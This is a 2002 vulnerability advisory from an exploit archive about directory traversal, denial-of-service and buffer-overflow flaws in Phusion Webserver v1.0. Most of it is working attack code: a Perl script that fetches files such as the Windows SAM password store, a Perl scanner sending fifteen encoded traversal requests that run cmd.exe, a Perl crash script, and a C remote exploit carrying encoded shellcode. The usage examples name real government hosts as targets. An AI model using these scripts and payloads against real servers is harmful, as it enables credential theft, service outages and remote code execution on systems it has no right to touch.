Phusion-web.txt

2002-02-19T00:00:00
ID PACKETSTORM:25774
Type packetstorm
Reporter Alex Hernandez
Modified 2002-02-19T00:00:00

Description

                                        
                                            `------oOo----------------  
Phusion Webserver Directory Traversal, DoS Vulnerabilities  
and BufferOverrun, (Released exploits Codes).  
------oOo----------------  
  
Phusion Webserver for Windows 9x/NT/2000 contains remote vulnerabilities  
  
which allow users to see and retrieve any file on the server.   
Exploit information included.  
  
  
Company Affected: www.BBShareware.com  
Version: v1.0  
Dowload: http://www.bbshareware.com/phusion/  
Size: 1.99 KB  
OS Affected: Windows ALL.  
  
Author:  
  
** Alex Hernandez <al3xhernandez@ureach.com>  
** Thanks all the people from Spain and Argentina.  
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins   
** G.Maggiotti & H.Oliveira.  
  
----=[Brief Description]=------------  
  
Phusion Webserver Server is an Webserver for Windows 9x/NT/2000.  
A bug allows any user to change to any directory and see   
files to PATH also GET files remotely also exist a BufferOverrun  
you can run abitrary code inside.  
  
----=[Summary]=----------------------  
  
>From the developer: "Phusion can be setup so that friends, family,   
clients, or co-workers can login to your computer, safely and securly  
from any internet connected computer in the world. No setup fees,   
no startup fees, no waiting, simply download and install Phusion,   
activate it, and your computer becomes a web site. You can pick the   
files and directories you want to share, and feel safe knowing that's  
all the users can access with Phusion's secure technology".<--jaja.   
  
  
Exist three vulnerabilities:  
  
a) Directory Traversal.(Exploits Released)  
b) Denial Of Service. (Exploits Released)  
c) BufferOverrun.(Exploits Released)  
  
  
------oOo--------  
  
Proof Of concept  
  
The security vulnerability is possible by using a specially crafted   
URL composed of triple dot ".../" directory traversal sequences,   
with HTTP encoded character representations substituted for "/"   
and "\".  
  
Example:  
  
http://www.example.com/.../.../.../.../test.txt  
  
sh-2.04# nc -vvn 10.0.0.1 80  
(UNKNOWN) [10.0.0.1] 80 (?) open  
GET /.../.../.../.../test.txt HTTP /1.0  
  
  
HAVE Fun! , i seen this file remote ;-)  
  
/Alex Hernandez!  
  
sent 41, rcvd 70  
sh-2.04#  
  
  
DoS  
  
Example:  
Server crashes after sending a very long URL:  
  
Examples:  
  
http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA  
  
sh-2.04# nc -vvn 10.0.0.1 80  
(UNKNOWN) [10.0.0.1] 80 (?) open  
GET /cgi-bin/.../.../.../.../ HTTP/1.0  
  
sent 42, rcvd 0  
sh-2.04#  
  
Crash system and the admin need restart the service!.  
  
  
Exploits:  
You can test your own IIS system with the following URL:  
http://10.0.0.1/scripts/..%c0%af (which translates to '/')  
Or  
http://10.0.0.1/scripts/..%c1%9c (which translates to '\')  
Or (For the execution bug)  
http://10.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\  
Or  
http://10.0.0.1/.../.../.../.../winnt/system32/cmd.exe?/c+dir+c:\  
  
  
NOTE: DEPENDING OF PATH THE INSTALLATION OF SOFTWARE.  
  
  
------oOo------------------------  
Exploit Code GET files Phusion-GET.pl  
------oOo------------------------  
  
#!/usr/bin/perl  
#  
# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN   
#   
# Simple script to get files on server.   
#   
# Maybe u need this line for windows:  
# #! c:\perl\bin\perl.exe  
#  
# Phusion Webserver v1.0 proof-of-concept exploit.  
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.  
#  
# Thanks all the people from Spain and Argentina.  
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,   
# G.Maggiotti & H.Oliveira.  
#   
#  
# Usage: perl -x Phusion-GET.pl <And read the Intructions>  
#   
#  
  
  
print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n");  
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");  
  
  
print <<"EOT";  
Please type the address remote webserver, example: www.whitehouse.gov  
[Default remote Webserver is "127.0.0.1"`]:  
EOT  
$host = <>;  
  
print <<"EOT";  
Please type only in the directory where the file is located you want to  
download,   
example: /winnt/repair/  
[default directory is "/winnt/repair/"] :#For IIS 4-5  
EOT  
$directory = <> || "/winnt/repair/";  
  
  
print <<"EOT";  
Please type in the filename you want download example: sam._   
[default file is "sam._"] :  
EOT  
$file = <> || "sam._";  
  
{  
#Maybe u to change this line depending of PATH installation.  
system("explorer.exe", "http://$host:80/../../..$directory$file");  
}  
  
print <<"EOT";  
HAVE Fun!. ;-)   
EOT  
  
  
  
------oOo------------------------  
Exploit Code Traversal Phusion_exp.pl  
------oOo------------------------  
  
#!/usr/bin/perl  
#  
# Simple script to identify if the host is vulnerable!,   
#   
# This does 15 different checks based IIS 4-5. Have Fun!  
#  
# Phusion Webserver v1.0 proof-of-concept exploit  
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.  
#  
# Thanks all the people from Spain and Argentina.  
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,   
# G.Maggiotti & H.Oliveira.  
#   
#  
# Usage: perl -x Phusion_exp.pl <Hosts>:<Port>  
#  
# Example:   
#  
# perl -x Phusion_exp.pl www.whitehouse.com:80  
# Trying.....................  
#  
# <THIS HOST IS VULNERABLE> :-)  
# Check the previous notes to execute bugs.  
#  
#  
  
use Socket;  
  
if ($#ARGV<0) {die "  
\nPhusion Webserver v1.0 traversal exploit(c)2002.  
Alex Hernandez al3xhernandez\@ureach.com\n  
  
Usage: perl -x $0 www.whitehouse.com:80 {OR}\n  
[if the host is not using a proxy]\n  
Usage: perl -x $0 127.0.0.1:80\n\n";}  
  
($host,$port)=split(/:/,@ARGV[0]);  
print "Trying.....................\n";  
$target = inet_aton($host);  
$flag=0;  
  
# ---------------test method 1  
my @results=sendraw("GET  
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 2  
my @results=sendraw("GET  
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir  
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 3  
my @results=sendraw("GET  
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 4  
my @results=sendraw("GET  
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 5  
my @results=sendraw("GET  
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 6  
my @results=sendraw("GET  
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
  
# ---------------test method 7  
my @results=sendraw("GET  
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 8  
my @results=sendraw("GET  
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
  
# ---------------test method 9  
my @results=sendraw("GET  
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 10  
my @results=sendraw("GET  
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir   
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 11  
my @results=sendraw("GET  
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir  
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 12  
my @results=sendraw("GET  
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir  
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 13  
my @results=sendraw("GET  
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir  
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 14  
my @results=sendraw("GET  
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../  
winnt/system32/cmd.exe\?/c\+dir  
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
# ---------------test method 15  
my @results=sendraw("GET  
/.../.../.../.../winnt/system32/cmd.exe\?/c\+dir  
HTTP/1.0\r\n\r\n");  
foreach $line (@results){  
if ($line =~ /Directory/) {$flag=1;}}  
  
#------------------------------  
if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n  
Check the previous notes to execute bugs\n";}  
else {print "<THIS HOST IS NOT VULNERABLE> :-( \n  
Check manually on browser...\n";}  
  
  
sub sendraw {   
my ($pstr)=@_;  
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||  
die("Socket problems\n");  
if(connect(S,pack "SnA4x8",2,$port,$target)){  
my @in;  
select(S); $|=1; print $pstr;  
while(<S>){ push @in, $_;}  
select(STDOUT); close(S); return @in;  
} else { die("Can't connect check the port or address...\n"); }  
}  
  
  
  
------oOo-------------  
Exploit Code DoS Phusion_DoS.pl  
------oOo-------------  
  
#!/usr/bin/perl  
#  
# Simple script to send a long 'A^s' command to the server,   
# resulting in the server crashing.  
#  
# Phusion Webserver v1.0 proof-of-concept exploit.  
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.  
#  
# Thanks all the people from Spain and Argentina.  
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,   
# G.Maggiotti & H.Oliveira.  
#   
#  
# Usage: perl -x Phusion_DoS.pl -s <server>  
#  
# Example:   
#  
# perl -x Phusion_DoS.pl -s 10.0.0.1  
#   
# Crash was successful !  
#  
  
use Getopt::Std;  
use IO::Socket;  
  
print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n");  
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");  
  
getopts('s:', \%args);  
if(!defined($args{s})){&usage;}  
  
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);  
  
$def = "A";  
$num = "3000";  
$data .= $def x $num;  
$serv = $args{s};  
$port = 80;  
$buf = "GET /cgi-bin/$data /HTTP/1.0\r\n\r\n";  
  
  
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");  
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");  
$proto = getprotobyname('tcp') || die("Error: $!\n");  
  
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");  
connect(S, $paddr) ||die ("Error: $!");  
select(S); $| = 1; select(STDOUT);  
print S "$buf";  
  
  
print("\nCrash was successful !\n\n");  
  
sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}  
  
  
  
------oOo------------------------  
Exploit Code BufferOverrun Phusion-ovrun.c  
------oOo------------------------  
  
/** Phusion-Overun.c   
** -Remote exploit for Phusion Webserver v1.0 for WinNT.  
**  
** Phusion Webserver v1.0 exploit gets remote servers's full control.  
** When you attacks a vulnerable server you can run abitrary code  
** inside.  
**  
** Phusion Webserver v1.0 proof-of-concept exploit.  
** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.  
**  
** Thanks all the people from Spain and Argentina.  
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,   
** G.Maggiotti & H.Oliveira.  
**   
**  
** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c  
**  
** Usage: ./Phusion-ovrun <hostname>  
**  
**  
**   
**  
**/  
  
  
#include <stdio.h>  
#include <unistd.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <sys/errno.h>  
#include <netdb.h>  
  
#define _PORT 80  
#define _X 10000  
  
char runcrash[] =  
"GET /"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"  
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"  
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"  
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"  
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"  
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"  
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"  
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"  
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"  
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"  
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"  
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"  
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"  
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"  
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"  
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"  
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"  
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"  
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"  
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"  
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"  
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"  
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"  
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"  
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"  
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"  
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"  
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"  
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"  
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"  
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"  
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"  
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"  
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"  
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"  
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"  
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"  
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"  
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"  
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"  
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"  
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"  
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";  
  
  
int sock;  
struct sockaddr_in sock_a;  
struct hostent *host;  
  
int main (int argc, char *argv[]) {  
  
printf("\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun  
exploit\n");  
printf("Alex Hernandez al3xhernandez@ureach.com\n\n");  
  
if(argc < 2) {  
fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);  
exit(0);  
}  
  
  
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {  
perror("gethostbyname");  
exit(-1);  
}  
  
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {  
perror("create socket");  
exit(-1);  
}  
  
sock_a.sin_family=AF_INET;  
sock_a.sin_port=htons(_PORT);  
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);  
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {  
perror("create connect");  
exit(-1);  
}  
  
fflush(stdout);  
  
write(sock,runcrash,_X);  
write(sock,"\n\n", 2);  
printf("done.\n\n");  
  
}  
  
  
  
  
------oOo------------------------------------  
Vendor Response:  
The vendor was notified  
support@bbshareware.com  
http://www.BBShareware.com  
Patch Temporary: No Data of vendor.  
  
Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.  
  
------oOo------------------------------------  
`